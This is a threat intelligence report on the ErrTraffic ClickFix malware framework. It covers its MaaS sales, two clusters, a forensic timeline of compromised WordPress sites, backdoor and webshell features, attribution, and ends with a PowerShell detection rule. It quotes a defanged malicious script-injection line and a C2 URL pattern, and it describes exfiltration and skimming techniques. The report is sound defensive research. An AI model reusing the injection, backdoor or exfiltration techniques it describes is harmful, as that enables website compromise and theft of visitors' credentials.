This article was originally distributed as a private report to our customers on 2 June 2026.

Introduction

As part of our threat intelligence and cybercrime mitigation efforts, the Sekoia TDR team actively monitors malware distribution campaigns leveraging the “ClickFix” social engineering technique. Consequently, we conducted an in-depth analysis of the ErrTraffic framework, a central component of this ecosystem.

Documented in late 2025 by HudsonRock, ErrTraffic is a JavaScript framework injected into compromised WordPress sites to deliver ClickFix lures. Operated under the Malware-as-a-Service (MaaS) model, it integrates a Traffic Distribution System (TDS) function. Similar to the ClearFake threat, it employs the EtherHiding technique as Dead Drop Resolver (DDR) to conceal its command and control (C2) infrastructure within the blockchain.

Operational analysis of this threat enabled the TDR team to identify two distinct ErrTraffic clusters. Through forensic investigations on targeted WordPress servers, we documented the toolkit used by attackers to compromise these servers and maintain persistence. Further, we uncovered an additional distribution campaign involving deceptive websites impersonating AI tools and platforms. 

This report details the ErrTraffic threat and its associated ecosystem, highlighting three specific campaigns and their operators’ arsenal. Finally, it provides several analytical hypotheses regarding the MaaS operations and the organisation of these affiliate groups.

ErrTraffic: ClickFix framework leveraging EtherHiding

ErrTraffic is a malicious JavaScript framework primarily injected into compromised WordPress sites to display the ClickFix lure and subsequently deliver malware to visitors. This framework is sold as a MaaS accompanied by a malicious WordPress plugin that facilitates deployment and an administration panel for managing payloads, statistics, geolocation-based filtering, and other features. ErrTraffic’s operator also sells the source code “as-is”.

The following are examples of ClickFix lures delivered by the ErrTraffic framework and displayed to visitors on compromised or adversary-controlled websites.

This turnkey TDS enables affiliates to spread malicious payloads effectively through compromised infrastructures or other adversary-controlled infrastructure.

Since its first version documented in late 2025 by HudsonRock, ErrTraffic went through several iterations. ErrTraffic v3, documented by LevelBlue in April 2026, uses the EtherHiding technique as DDR. The injected script on compromised WordPress sites queries a smart contract on a blockchain to retrieve the ErrTraffic C2 server. This mechanism allows the attackers to rotate infrastructure without redeploying code across thousands of compromised sites and helps prevent blocking by security solutions through regular updates.

Malware-as-a-Service operations on Exploit.IN

ErrTraffic advertising by LenAI

Since at least December 2025, the threat actor operating under the handle LenAI has advertised and sold the ErrTraffic framework under a MaaS model, on the Exploit.IN cybercrime forum and Telegram.

ErrTraffic’s pricing model evolved during the first half of 2026. Monthly subscription fees rose from $300 to $380, and the price of the source code doubled from $1,500 in January to $3,000 in April, reaching $4,500 when lifetime updates and support were included. The subscription model includes a limited number of rental spots, restricting access to a selected group of clients, and operating on a queue-based system. This operating mode is typical for TDS used to spread malware, as it prevents excessive exposure to multiple threat actors that could attract security researchers’ attention, increase detection rate, and thus lower the framework’s infection rate. Additionally, the user LenAI offers vetted cybercriminals a free one-day trial and a one-day refund on rentals.

Notably, LenAI has recently updated its business strategy: originally offering subscriptions ranging from one day to one month, ErrTraffic subscriptions are now sold from one month to six months. TDR analysts assess with high confidence that this shift underscores a lucrative and efficient cybercrime business model, as well as its successful establishment within the traffic distribution ecosystem.

LenAI’s thread advertising ErrTraffic’s on Exploit.IN primarily includes publications showcasing new features, including:

• A WordPress plugin facilitating deployment of the malicious framework on compromised sites.
• Obfuscation and encryption for the injected ErrTraffic script (using AES and JavaScript obfuscation).
• The use of a Polygon smart contract for panel resolution.
• Social engineering lures employing the ClickFix tactic (BSOD screen, reCAPTCHA, and Cloudflare Turnstile CAPTCHA) to distribute malicious commands.
• A TDS implementing geofiltering, malware targeting based on HTTP Referrer routing and OS detection supporting Windows and macOS hosts.
• PowerShell command lines for downloading the malicious payload.
• A statistics module for tracking visits, delivery, and execution.

Alleged ErrTraffic affiliates on Exploit.IN

By 20 May 2026, ten Russian-speaking threat actors and one English-speaking threat actor had participated in the ErrTraffic thread on Exploit.IN: Ghost_devil, Dummy, mudila, willard, MasonDex, yayo, Jesse_D, Vasyavasilyev, Specta666, mtd, and tope (English-speaking). They either recommended the service or expressed interest. Several participants shared positive feedback, praising LenAI’s professional and helpful support. Other forum posts highlighted the project’s quality and strong conversion rate, which corresponds to the percentage of successful infections relative to the number of visitors. For example, the user mudila stated a “10% rate, which is impressive” (translated from Russian).

Alleged ErrTraffic affiliates are mostly active in discussion threads concerning malware distribution. Most have been engaged in threads covering malware (crypters, infostealers, RATs) for the Windows, macOS and Android platforms. Several also showed interest in traffic, including Google Ads and YouTube Ads for malvertising, cloacking services (TDS), buying or selling Pay-Per-Install (PPI) services, or recruiting traffers.

Notably, in November 2025, the user mtd began advertising a PPI service for Windows and macOS payloads, offering “traffic” worldwide, specifically in the United States, Canada, Europe, and Australia. On 19 April 2026, the cybercriminal posted the following feedback in the ErrTraffic thread, demonstrating mtd’s loyalty as a customer:

“So far, the only product that actually gives a normal conversion rate and does not catch clickfix flags every 5 minutes. I recommend you to work.” (translated from Russian)

Based on mtd’s activities on Exploit.IN, we can reasonably hypothesise that the threat actor leverages ErrTraffic to distribute malware as part of its PPI service. This hypothesis aligns with the framework’s capabilities, which allow affiliates to deliver payloads based on the victim’s geolocation, offering “traffic” tailored by location.

ErrTraffic clusters

Our investigation of compromised WordPress sites allowed us to identify two main ErrTraffic clusters:

• “Analytics” cluster
• “Beer” cluster

The “Analytics” ErrTraffic cluster, previously documented by LevelBlue and other threat reports, relies on the Polygon blockchain and the cryptocurrency wallet address 0x08207B087F61d7e95E441E15fd6d40BEfd6eD308 to retrieve the C2 domains and fetch Vidar infostealer payloads during April and May 2026.

The “Beer” ErrTraffic cluster interacts with the Polygon blockchain by querying various public RPC endpoints, mainly Quicknode. Several wallet addresses are used, according to the deployed ErrTraffic framework, to retrieve C2 domains predominantly characterised by the .beer TLD. This cluster distributes several malware families, including infostealers such as Vidar, Stealc, Remus and Salat.

Both clusters rely on compromised WordPress sites to inject ErrTraffic’s malicious JavaScript that displays the ClickFix lure. TDR analysts conducted forensic analysis on a few compromised WordPress sites to recover the backdoors used to deploy the framework. The analysis revealed distinct PHP backdoors: one used by the ErrTraffic “Analytics” cluster, and at least two used by campaigns leveraging the ErrTraffic “Beer” cluster. Additionally, our investigation determined that the attackers used harvested credentials to gain initial access to WordPress accounts and to install their backdoors. These campaigns, which deliver the ErrTraffic framework on compromised WordPress sites, are detailed in the “ErrTraffic campaigns” section.

Notably, investigations also revealed that some WordPress sites were compromised by both ErrTraffic clusters, indicating an operational overlap and potential competition between the operators.

“Analytics” ErrTraffic cluster

The “Analytics” ErrTraffic cluster uses a single, stable smart contract on the Polygon blockchain 0x08207B087F61d7e95E441E15fd6d40BEfd6eD308 to resolve its C2 infrastructure. On average, the C2 server is updated on a daily basis, with domains using unusual and suspicious TLDs, including .cfd, .club, .click, .cyou, .lat, .sbs, .shop, and .xyz.

A distinctive feature of the ErrTraffic framework of this cluster is the use of the /cf.js endpoint to fetch the script embedding the ClickFix lure from its C2 infrastructure. For this cluster, the initial ErrTraffic injection script is also Base64-encoded and XOR-obfuscated, and uses the EtherHiding technique to fetch the C2 domain. Subsequently, it retrieves the ClickFix lure from the /cf.js endpoint. Unlike the “Beer” ErrTraffic cluster, communications with the C2 are not obfuscated.

In April and May 2026, we observed the Vidar infostealer being exclusively distributed by this primary ErrTraffic cluster.

“Beer” ErrTraffic cluster

The “Beer” ErrTraffic cluster uses several smart contracts on the Polygon blockchains for its DDR, storing the C2 domains, mostly using the TLD .beer in May 2026. This cluster relies on Quicknode to interact with Polygon smartcontracts. We therefore named this cluster “Beer” based on its consistent use of the unusual and suspicious TLD.

A distinctive feature of this cluster was the use of the /api/css.js endpoint to fetch the script embedding the ClickFix lure from its C2 infrastructure. This feature involved injecting two lines of code into the compromised web pages, rather than using the EtherHiding DDR technique. Instead, a DNS-prefetch tag pre-resolves the ErrTraffic domain to speed up access, while the second line loads the ErrTraffic injection script from an external JavaScript file via the /api/css.js endpoint. This technique is no longer in use and appears to represent an older injection method.

<link rel="dns-prefetch" href="//llc-image-ico[.]click">
<script type="text/javascript" defer="" src="hxxps://llc-image-ico.]click/api/css.js?b=45fcb62d&amp;r=731542" id="h42bd41a32a94-js">
</script> 

Since March 2026, compromised WordPress sites have been directly injected with an obfuscated ErrTraffic JavaScript payload that uses Base64-encoding, XOR and text-encoding techniques to decode a second-stage script. This JavaScript queries the blockchain to resolve the C2 address, initiates the communications with the C2 using RC4 encryption, and retrieves the ClickFix lure after a few API requests to /api/index.php.

The command copied to the clipboard is retrieved via an API call following this URL pattern:

hxxps://[ERRTRAFFIC-DOMAIN]/api/index.php?a=ctx&os=windows&src=cloudflare&cb=[BROWSER]&ref=[REFERRER]&mode=download&rid=[RAY_ID]

The API returns a JSON object containing the RC4-encrypted command, with a key tied to the injection script. The resulting PowerShell command is particularly distinctive, featuring a pattern such as <# Code Verification: 656560395146 #> at the beginning of the string, which offers an effective pattern for detection and hunting.

While the “Analytics” ErrTraffic cluster uses a single smart contract, the “Beer” cluster appears to use a distinct smart contract for each payload. Indeed, we have observed different payloads being delivered depending on the specific smart contract utilised.

Payloads distributed by this cluster vary significantly across different smart contracts. We have identified both well-documented infostealer families (Vidar, Stealc, Remus, Salat) and undocumented ones, as well as RATs and loaders (e.g. SmokeLoader).

ErrTraffic campaigns

Investigation of the “Beer” and “Analytics” clusters revealed that several threat actors operate the ErrTraffic JavaScript framework to deliver their payloads. These cybercriminals are using various entry vectors to deploy ErrTraffic on websites and target a broad audience.

By analysing these clusters, we identified campaigns that compromise legitimate WordPress websites to inject ErrTraffic by using various backdoors, as well as a campaign suspected to be leveraging malvertising to spread an attacker-controlled website impersonating AI platforms (Google Antigravity, ChatGPT).

For the “Beer” cluster, TDR analysts assess with high confidence that each smart contract is associated with a distinct threat actor distributing their own payload. For compromised WordPress websites, we have also concluded that each attacker deploys its ErrTraffic framework version by using their own tooling to inject web pages. Indeed, we identify several modi operandi for deploying the ErrTraffic JavaScript, such as distinct backdoors, various initial access attempts to compromise WordPress accounts, and different TTPs during the compromise.

As of May 2026, the following is an overview of the ErrTraffic campaigns associated with the “Beer” and “Analytics” clusters:

• The “bintang” campaign, associated with one smart contract of the “Beer” ErrTraffic cluster.
• The impersonated AI platform campaign, supposedly using malvertising to spread an attacker-controlled site impersonating Google Antigravity and delivering Danabot.
• The “Analytics” campaign, which is the only one delivering the “Analytics” ErrTraffic cluster, spreading Vidar through a unique smart contract.

“Analytics” campaign

To understand the attacker’s methodology, we reached out to several victims to obtain forensic data. One of them responded favourably to our request, providing their Apache access logs as well as a complete dump of their WordPress instance.

Technical analysis revealed that the site was compromised in early March 2026, roughly two months prior to our investigation. The breach did not involve the exploitation of a technical vulnerability; instead, the attacker gained access using valid administrator credentials, likely harvested via an infostealer.

The subsequent infection aligns with the PHP backdoor documented by Monarx on 9 March 2026 and further highlighted by LevelBlue. The deployment process involved inserting a dropper into the active theme’s functions.php file, which then generated a malicious MU-plugin titled session-manager.php.

Acting as the primary backdoor, this plugin injects the ErrTraffic framework, displays the ClickFix lure to visitors, and provides a webshell. Log analysis confirmed consistent communication between the attacker and the server through this established webshell.

Compromise timeline

Credentials validation

On 7 March 2026, within an 80 seconds window, seven geographically distributed IP addresses were observed each submitting a single POST request to /wp-login.php. Six of these seven attempts resulted in an HTTP 302 redirection code issued by WordPress following a successful authentication. None of the seven IPs submitted any subsequent requests.

The distribution across seven consumer residential ISPs spanning three countries is consistent with the use of a credential stuffing tool routed through a residential proxy service. 

This behaviour characterised by wide geographical distribution, CLI-based tooling, a single POST request without further exploitation, and a “single-hit” success pattern; is typical of a distributed validation service for stolen credentials.

First access and reconnaissance

On 8 March 2026, two North American residential IP addresses (96.178.187[.]175 and 96.181.156[.]219) successfully logged in to the WordPress site. The fact that both addresses succeeded on the first attempt rules out any possibility of brute force discovery. The attacker clearly possessed valid credentials, which is consistent with the suspicious activity observed on 7 March.

Both IPs used an identical User-Agent string: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 and their activity occurred within a window of only fourteen seconds. They had no prior history on the site and did not come back. The sequence of events following authentication was identical for both IP addresses:

1. GET /wp-login.php?redirect_to=…&action=confirm_admin_email&wp_lang=en_US – HTTP 200: this page is served only to accounts with the manage_options capability. This confirms that the attacker had administrator-level access. 
2. GET /wp-login.php?…&remind_me_later=<token> – HTTP 302: it dismisses the administrative confirmation prompt to proceed to the backend.
3. GET /wp-admin/ – HTTP 200: it successfully lands on the WordPress administrative dashboard.
4. GET /wp-json/wp/v2/users/me?context=edit – HTTP 401: a REST API request fails due to a missing CSRF nonce (X-WP-Nonce). This failure strongly suggests the attacker was using a CLI script rather than a standard browser executing WordPress JavaScript.
5. GET /wp-admin/theme-install.php – HTTP 200: this loads the theme installation page, which requires the install_themes capability. This validates that the account has the permissions necessary for the upcoming backdoor deployment. 

The primary objective of this phase was the operational validation of the credentials harvested on 7 March. Beyond simple access, the attacker sought to confirm the “depth” of their privileges, specifically to ensure they possessed the necessary rights to modify themes and deploy the malicious backdoor.

Backdoor deployment

On 12 March 2026 the operator reconnected to the WordPress site from two new residential IP addresses: 172.59.242[.]93 and 68.60.174[.]238. Both IPs used the same User-Agent string (Chrome 144) previously observed on 8 March. The deployment operation was executed in four successive phases over a short duration.

Step1 – Probing backdoor

The operator submitted a series of POST requests targeting the backdoor endpoints documented in the Monarx report, specifically:
POST /?wp_debug_session=a3f8b2c1d4e5f6071829304a5b6c7d8e9f0a1b2c3d4e5f607182930a1b2c3d4e&mode=php.

This value is identical to the one referenced in the Monarx report, suggesting a secret shared between multiple victims of the same operation.

This phase demonstrates that the operator first verifies the target’s pre-existing state to determine if it has already been compromised. As all checks returned negative results, the target was confirmed to be uncompromised yet, enabling the deployment to proceed.

Step2 – CVE-2020-25213 exploitation attempted

Eleven GET /wp-admin/admin.php?page=wp_file_manager requests are submitted in parallel with the other phases, all of which return an HTTP 403 status. This URL is the administrative entry point for the WP File Manager plugin, which is affected by CVE-2020-25213 (a pre-authentication RCE vulnerability). As the plugin is not installed on this specific instance, the exploit remains ineffective.

The persistence of these eleven attempts, alongside other actions, indicates that the operator possesses multiple pre-built attack chains. This activity demonstrates the automated deployment of a plugin-based RCE path, either as a fallback or as a complement to the credential-based method. 

Step3 – Authentication and stager

The authentication sequence observed on 8 March is repeated. Next, the stage deployment phase proceeds as follows:

1. GET /wp-admin/theme-editor.php: the operator loads the theme file editor with the default file (style.css) to retrieve the required CSRF nonce. 
2. GET /wp-admin/theme-editor.php?file=functions.php&theme=hello-elementor: the current content of the targeted file, functions.php from the hello-elementor theme, is loaded. 
3. POST /wp-admin/theme-editor.php: the new content is written to the server, with the dropper encapsulated between the specific markers /* __mu_deployer__ */ 
4. GET /wp-admin/theme-editor.php?theme=hello-elementor&file=functions.php&wp_scrape_key=be61936de03f3842ee814fd80a10233a&wp_scrape_nonce=1436824527: this request corresponds to the native WordPress safety mechanism. Following any edit to a theme PHP file. The core triggers an automated request to ensure the modification does not cause a fatal PHP error upon loading. A successful request (HTTP 200) confirms that the malicious code is syntactically valid and has passed WordPress validation.

Step4 – Backdoor enable

Five seconds after the write operation, the POST /?wp_debug_session=…&mode=php requests, which initially returned the full WordPress homepage, began returning short responses.

This signature confirms that the dropper executed upon the first page load and performed the following actions:

• It decoded the Base64-encoded payload.
• It wrote the MU-Plugin to wp-content/mu-plugins/session-manager.php.
• The malicious code removed itself from the functions.php file, consistent with the behaviour described in the Monarx report.

The backdoor now intercepts requests via the init or plugins_loaded hooks, returning concise JSON responses instead of the standard WordPress HTML output.

Post exploitation

From the point of initial compromise, the attacker accessed the server daily via the webshell. All connections were consistently routed through residential IP addresses using the same User-Agent (Chrome 144), demonstrating that the attacker’s backend utilises a residential proxy service.

While the logs do not capture the data sent via POST, the small size of the requests suggests they probably serve as a form of health check. We also observed more intensive traffic on specific dates, notably 29 March and 6 May. This activity corresponds to a redeployment of the ErrTraffic framework, almost certainly representing an update to the ClickFix injection script mechanism.

Among other actions, the attacker modified the following files:

• user.ini: the auto_prepend_file directive was used to load a hidden PHP script. This script exfiltrates cookies to the domain webanalytics-cdn[.]sbs.
• .htaccess: instructions were added to disable caching, ensuring that malicious scripts and injections are served fresh to every visitor.

Backdoor

In addition to implementing the ErrTraffic TDS framework, session-manager.php is a multi functional PHP implant deployed as a WordPress MU-Plugin. This category of plugin is automatically loaded by the CMS without explicit activation and cannot be disabled through the administration interface. The infection begins with a Base64-encoded dropper that writes the payload to the wp-content/mu-plugins/ directory to ensure automatic execution on every request. 

The implant also includes the following features:

• Anti-detection: The mechanism inspects the User-Agent of incoming requests for signatures of known security tools (such as Wordfence, Sucuri, WPScan, Nessus, Nikto, and Burp). If detected, it suspends all malicious blocks using a WordPress transient for 30 minutes, rendering the plugin inert during scans.
• Credential harvesting: Credentials are harvested via a hook on the WordPress authentication process. Every login attempt is intercepted, and the credentials are stored redundantly in files disguised as images. Since the image name and path remain consistent across installations, anyone can retrieve credentials from any WordPress site compromised by this specific backdoor by requesting this URL.
• Webshell: Three independent remote code execution channels are available: a GET parameter authenticated by a secret key, an HMAC cookie with a time-window, and a REST API endpoint accepting POST requests via an X-WP-Session header. These webshells expose primitives for shell execution, PHP evaluation, file operations, and direct SQL queries. A notable OPSEC flaw is the reuse of an identical authentication key across all compromised sites.
• Persistence: Persistence is maintained through seven distinct layers: a full copy of the MU-Plugin in the database, a credential harvester injected into wp-login.php (restored hourly), a stub in the active theme’s functions.php, five “scatter” PHP files hidden in legitimate directories, and the disabling of automatic updates. Each scatter stub can, upon authenticated request, restore any other component, create a hidden administrator account, or update its own codebase.
• Analytics: A JavaScript beacon is placed in the footer of every public page, transmitting visitor metadata to C2 domains (webanalytics-cdn).
• Skimming: A PHP component functions as a skimmer specifically targeting WooCommerce order data. With every new order, fields such as billing_first_name, billing_email, billing_phone, billing_country, order_total, and order_currency are intercepted and saved to a dedicated table. This approach follows classic Magecart logic but utilises native WordPress hooks rather than a client-side injected JavaScript skimmer.

The backdoor contains fixed paths and patterns that can be proactively scanned. A scan performed on a sample of WordPress servers infected by the “Analytics” ErrTraffic cluster revealed that the backdoor was present across the entire sample.In contrast, the backdoor was identified on fewer than 2% of a sample of sites from the “Beer” cluster. This disparity confirms that this specific backdoor is used exclusively by the “Analytics” cluster. The minor overlap is explained by servers being cross-infected by both clusters, further demonstrating that they represent distinct campaigns.

“Bintang” campaign

We were able to obtain a data dump from a website compromised by the Beer cluster that is linked to the ErrTraffic smart contract 0xb36482fE794B895695914779Db3909b471D1aA43. The final payload delivered by this campaign was the Vidar infostealer. 

We dubbed this campaign “Bintang”, after the popular Indonesian beer to reflect the link between the “Beer” cluster and Indonesian patterns identified within the operator’s toolkit. 

Technical analysis reveals that the site was initially compromised on 5 March 2026 by the ErrTraffic “Beer” cluster, and subsequently on 29 March by the ErrTraffic “Analytics” cluster. 

According to Flare.io, an administrator account was stolen via an infostealer in October 2025 and has been available in credential leak databases since February 2026. It is therefore highly probable that the attacker compromised this server using these credentials.

Notably, the compromised account is associated with an employee of a firm providing web design and SEO services. During our analysis, we identified several compromised sites whose only common denominator was being developed by this same agency, whose own website was also infected by the same ErrTraffic cluster. 

The compromise of service provider accounts is particularly valuable to attackers, as it allows them to scale their efforts by gaining access to an entire portfolio of client sites through a single set of credentials.

Compromission timeline and payloads

In the absence of web logs, the starting point for the analysis was the identification of ErrTraffic injection scripts. This investigation revealed a footprint significantly larger than that of standalone ErrTraffic injectors; several distinct families of PHP backdoors were also identified.

These malicious payloads differ in their coding style, but they also exhibit functional overlaps. Despite these differences, we assume they are likely deployed and managed by the same operator. Three independent indicator classes link all observed artefacts to a single deploying entity:

• Every file analysed contains an HTML comment marker in the exact format <!–[A-Za-z0-9]{8}–> at the top of the file, with the alphanumeric identifier varying across samples but consistently adhering to the eight-character limit and the mixed-case alphanumeric character set.
• Attacker-generated filenames embed Unix epoch timestamps that match  the corresponding file modification time, indicating that the deployment tool automatically generates them at write time. 
• The typosquatted naming repertoire (styIe.php, singIe.php, functlons.php, lndex.php, 4O4.php, connents.php) across all batches and across all five families, indicating a common naming engine that operates independently of the deployed shell’s content.

The deployment timestamps reconstructed from filesystem mtime and from Unix-epoch suffixes embedded in attacker-generated filenames produce the following chronology. Each deploy corresponds to a discrete batch of files deposited within a two-to-five minute window, consistent with automated tooling rather than interactive operator activity. The epoch suffixes resolve down to the second to the corresponding modification timestamps, indicating that filenames are programmatically generated at deployment time.

It should be noted that sandbox detonations demonstrate that the ErrTraffic C2 servers linked to this smart contract were active in early March and went offline as of March 17, 2026. Since ErrTraffic operates as a MaaS, it can be assessed that the operator did not renew their subscription to the tool. As illustrated in the chart below, correlating this data with the deployment dates reveals that the operator implements specific tooling designed to inject ErrTraffic into WordPress pages. The transition to different tools coincides with the C2 infrastructure going offline; this suggests that the operator adapts their toolkit to repurpose or otherwise exploit the compromised WordPress instances. 

Arsenal overview

As detailed in the previous section, the investigation identified a multi-component toolkit. This chapter focuses exclusively on the tools directly associated with the ErrTraffic deployment.

ErrTraffic framework

The ErrTraffic framework deployed on the WordPress instance consists of two principal artifacts:

• The PHP injector stub: A compact loader named file-updater-[a-zA-Z0-9]{8}.php or its variants, that dynamically hooks into the WordPress page-rendering process to load the second component.
• The ErrTraffic JS Injector: A JavaScript file (css.js) containing the XOR-encoded ErrTraffic injector.

Responsive webshell

This PHP payload is a webshell of 21.8 KB, designated internally as the “Responsive Webshell” due to the presence of this specific pattern within the code. It is a sophisticated, GUI-based PHP webshell that leverages modern web technologies (Bootstrap 5, FontAwesome, and SweetAlert2) to provide a “responsive” and user-friendly management console. It includes the following features:

• Runtime function masking: The shell avoids static detection by storing critical PHP function names (e.g. system, shell_exec, file_get_contents) as hexadecimal strings in the $iniarray variable. These are decoded at runtime into a $func array using a custom hexa() function, ensuring that sensitive keywords never appear in the plaintext source code.
• Environment preparation: Upon execution, the shell actively modifies the PHP environment to facilitate its operations. It attempts to disable error reporting, bypass execution time limits, and clear file status caches using @$func[33] (mapped to ini_set).
• Full file system orchestration: The interface provides a comprehensive suite of file management capabilities:
  • Navigation: Directory traversal and breadcrumb generation.
  • Manipulation: Uploading (including multi-file support), renaming, editing, and deleting files/folders.
  • Permissions: Real-time chmod modification and file owner/group identification.

• System reconnaissance: The shell includes a dedicated “Server Info” module (branded as BlackDragon) that audits the server’s capabilities, checking for the availability of mail(), curl, and MySQL, while extracting the disable_functions list to identify potential execution bottlenecks.

This shell accounts for the vast majority of deployments observed during March 2026. Its consistent deployment in multiple locations for each victim (typically three to six instances) suggests it acts as the primary access hub for the broker and is likely used to deploy the ErrTraffic framework.

The code contains internal references to “karma-syndicate” and “BlackDragon”, likely identifying the developer group or the specific toolkit version. Stylistic indicators found in the error messages of one variant include strings in Indonesian. This finding correlates with the filtering implemented by the ClickFix API, which blocks infections within Indonesia associated with this campaign. Taken together, these factors suggest that the operator of the “bintang” campaign deploying the ErrTraffic “Beer” cluster via this specific smart contract may be based in South East Asia.

Based on the analysis of the toolkit associated with smart contract 0xb36482fE794B895695914779Db3909b471D1aA43, targeted scans were conducted across a sample of servers infected by the ErrTraffic Beer cluster. The low response rate indicates that only servers specifically tied to this smart contract responded to the probes.

This demonstrates that this specific toolkit is exclusively linked to this contract. Consequently, we can hypothesise that, for the “Beer” cluster, each smart contract represents a distinct operator or affiliate, each managing their own post-exploitation tools within the broader ErrTraffic framework.

Impersonated AI platform campaigns

Monitoring of the “Beer” cluster has revealed the existence of non-WordPress websites delivering ErrTraffic. These sites impersonate AI tools or platforms. Recently registered and mimicking the branding of the targeted companies, these websites are empty shells whose sole purpose is to deliver payloads via ErrTraffic. 

Through these lures, attackers specifically target developers and AI researchers, a demographic frequently possessing elevated system privileges. TDR assesses that the objective is to steal API tokens and credentials for premium AI platforms, which are highly lucrative assets on underground resale marketplaces.

Google Antigravity themed

The antigravity[.]study website presents itself as a multi-OS download page for the Google Antigravity tool. Google Antigravity is positioned as an agentic AI platform and high-performance computing framework.

The domain was registered on 15 May 2026 through the Global Domain Group and is hosted on a shared server. The website’s design replicates the branding and infographics typically associated with official Google software distribution portals. 

Upon accessing the site, the ErrTraffic JavaScript triggers a “Blue Screen of Death” (BSOD) ClickFix lure associated with the smart contract 0x5b7F9C87773fFc7FAbEFcBeDFe3527BCE98C328. 

Executing the provided command restores the page’s visibility. However, analysis revealed that the website is entirely non-functional; all download links are empty <a> tags. These elements confirm that the site is a dedicated lure, constructed for the sole purpose of delivering ErrTraffic, likely through a malvertising campaign targeting the AI users. The PowerShell command drops and executes an MSI file. Dynamic analysis via sandbox execution confirmed that this MSI functions as a loader that delivers DanaBot malware.

ChatGPT themed

The malicious domain chatgpt-web[.]vip mimics the official ChatGPT landing page and was registered on 22 May 22 2026, via Dynadot. 

Notably, the IP address hosting chatgpt-web[.]vip was previously associated with the domain defi-xstocks[.]vip. Registered on 18 April 2026, through Dynadot, this latter domain currently redirects to chatgpt-web[.]vip.

The defi-xstocks naming convention refers to XSTOCKS, a platform known for tokenising US stocks and ETFs on the blockchain, combined with the DeFi (Decentralised Finance) acronym. This overlap strongly suggests that the operator is targeting cryptocurrency users and Web3 investors, likely aiming to drain digital wallets or harvest highly sensitive financial credentials via the delivered payload.

Affiliation hypothesis

After unveiling both “Analytics” and “Beer” ErrTraffic clusters, investigating the campaigns spreading the framework, and examining the cybercrime services provided by LenAI, the TDR team sought to correlate these findings to identify the threat actors responsible for these ErrTraffic clusters and campaigns.

One framework, two clusters, multiple campaigns

As described in the “Clusters” subsection, the two identified ErrTraffic clusters differ in the following areas:

• The URL endpoints previously used to retrieve the ClickFix lure: /api/css.js for “Beer” cluster and /cf.js for “Analytics” cluster).

• JavaScript code sophistication: obfuscated scripts is used for the “Beer” cluster, whereas cleartext JavaScript is deployed in the “Analytics” cluster except for the initial script.
• The data parameter in the JSON-RPC queries differs between smart contracts, validating the use of distinct function calls for each cluster. 
• The encryption of ErrTraffic API requests: exclusively implemented in the “Beer” cluster.
• C2 infrastructures: differences exist across TLDs, domain registration details, and default HTTP responses.

Sekoia TDR analysts therefore assess with high confidence that these clusters use two distinct versions of the ErrTraffic framework and that their respective C2 infrastructures are operated by two different threat actors.

Forensic analysis of several compromised WordPress instances across both clusters, combined with the tracking of deployed backdoors, leads us to conclude with high confidence that:

• The “Analytics” cluster is leveraged exclusively by a single campaign, which we named “Analytics” campaign, and consistently:
  • Uses the same PHP backdoor on compromised WordPress servers.
  • Relies on a single smart contract as a DDR mechanism.
  • Continues to distribute the Vidar infostealer as of April and May 2026.

• The “Beer” cluster is used by multiple campaigns, including the “bintang” and suspected malvertising campaigns, according to the following technical evidence:
  • Campaigns associated with the “Beer” cluster are diverse, including compromised WordPress instances and malicious sites impersonating AI platforms assessed to be promoted via malvertising.
  • WordPress sites are compromised using varying backdoors and TTPs, furthermore, a smart contract appears to be uniquely paired with a specific backdoor.
  • Each smart contract delivers a distinct payload, with no identified overlap between them based on loader file types, crypters, or malware families. 

Thus, TDR analysts hypothesise that several threat actors use the ErrTraffic “Beer” cluster and its associated infrastructure to deliver their payloads. At a given time, each cybercriminals using the ErrTraffir “Beer” conduct its own campaign and employ its own smart contract. It is highly likely that these cybercriminals independently deploy the malicious framework by embedding their contract address, either on a compromised WordPress instance or on a dedicated malicious website.

ErrTraffic affiliates

LenAI’s Malware-as-a-Service subscriptions and source code sales on Exploit.IN enable us to infer associations between ErrTraffic clusters and campaigns and specific threat actors.

• “Beer” cluster: MaaS rentals

TDR analysts assess with high confidence that the “Beer” cluster is operated by LenAI and offered to ErrTraffic affiliates through a MaaS subscription. This assessment is based on multiple campaigns distributing various malware families via different initial access TTPs. This would also explain the unified C2 infrastructure, with domains likely registered by LenAI.

We believe each ErrTraffic affiliate accesses a dedicated smart contract tied to a C2 domain, used exclusively for their malware distribution activities, alongside an administration panel. To operate ErrTraffic, affiliates generate the initial JavaScript code to inject into compromised WordPress sites, embed their own contract address, and upload their malicious payload on the ErrTraffic panel.

• “Analytics” cluster: source code

Regarding the “Analytics” cluster, we conclude that the cluster and its associated campaign are operated by a single threat actor who likely purchased the source code of an older version of ErrTraffic. This assessment is based on the unified C2 infrastructure, the exclusive Vidar payload distributed over recent months, and, in particular, the use of a single PHP backdoor on compromised WordPress sites. We believe that this cluster uses an older version of ErrTraffic, as evidenced by code differences in the JavaScript framework between the two clusters, including less advanced obfuscation of ErrTraffic communication, ClickFix JavaScript, and PowerShell commands.

During our investigation, we found no evidence that enables the identification of the threat actor behind this cluster and campaign. 

• “Bintang” campaign: possible attribution

By monitoring the Exploit.IN thread advertising ErrTraffic, we identified an alleged customer operating under the handle tope who was “looking for an Indonesian bank provider” in another thread. Notably, this cybercriminal is the only English-speaking participant in the ErrTraffic thread. Pivoting to their Telegram profile @cybershell_master, we found that this threat actor belongs to the Telegram group @wshellmarketIND (“Webshell Market Indonesian”) and was active in other webshell-related channels (“Webshell Market Chat”, “Webshell Shell Markett obrolan” and “Webshell / Cpanel / Smtp / Rdp”). Additionally, tope is active in multiple threads related to malware, traffic, and cryptocurrency-targeted campaigns.

As detailed in the “bintang” campaign subsection, we identified Indonesian words within this campaign’s toolkit, including the webshell kit. Therefore, we assess with high confidence that the threat actor using the handle tope (aka cybershell_master) is an ErrTraffic customer using the subscription model and they leverage advanced webshell skills to deploy the ErrTraffic framework on numerous compromised WordPress sites.

Detections opportunities

The ClickFix pages associated with ErrTraffic use PowerShell to distribute the final payload. In the case of ErrTraffic, the PowerShell command contains a XORed string which is decrypted and executed. The de-XORed string contains classic dropper instructions, downloading and executing the binary.

In some instances, the script downloads both the 7z executable and an archive containing the payload; the 7z binary is then used to extract the archive before the payload is executed. While these techniques are well-covered by standard XDR rules, it is possible to implement specific coverage for ErrTraffic by targeting unique patterns within the XORed command via PowerShell ScriptBlockText logging.

detection:
  selection:
    action.properties.ScriptBlockText|startswith: "<"
    action.properties.ScriptBlockText|contains|all:
      - "#>"
      - "-bxor[int][char]$"
      - "[convert]::ToInt32"
      - "-lt"
